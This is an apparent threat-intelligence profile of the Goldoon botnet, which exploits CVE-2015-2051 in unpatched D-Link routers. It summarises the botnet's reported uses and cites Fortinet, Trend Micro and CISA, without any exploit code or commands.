Goldoon | |
Type of Malware | Botnet |
Date of initial activity | April 2024 |
Motivation | Trend Micro said it observed the routers being used for different purposes, such as Secure Shell (SSH) brute forcing, pharmaceutical spam, employing server message block (SMB) reflectors in NTLMv2 hash relay attacks, proxying stolen credentials on phishing sites, multi-purpose proxying, cryptocurrency mining, and sending spear phishing emails. |
Attack Vectors | Exploitation of CVE-2015-2051 |
Tools | BAT/Agent.G!tr.dldr |
Targeted System | Linux |
Overview
Researchers have unearthed a newly discovered botnet named Goldoon, which exploits a long-standing vulnerability in unpatched D-Link routers. This flaw, identified as CVE-2015-2051, is characterized by a low attack complexity yet poses a critical security risk, allowing remote execution of code on compromised hardware, according to a report by cybersecurity firm Fortinet. “Once attackers successfully exploit this vulnerability, they can enlist compromised devices into their botnet for launching subsequent attacks,” Fortinet stated. The botnet takes its name from a component known as goldoon.server found within the spreading malware. Goldoon is capable of gathering intelligence about the targeted systems and is employed by hackers to orchestrate distributed denial-of-service (DDoS) attacks, a typical function of botnets. The vulnerability in D-Link routers was addressed through a firmware update released in the first half of 2015. However, the persistence of unpatched D-Link hardware has recently attracted scrutiny from researchers and the U.S. Cybersecurity and Infrastructure Security Agency (CISA). In April, the agency highlighted ongoing exploits targeting older D-Link devices by threat actors.Targets
D-Link routers with a nearly decade-old critical security flaw (CVE-2015-2051)
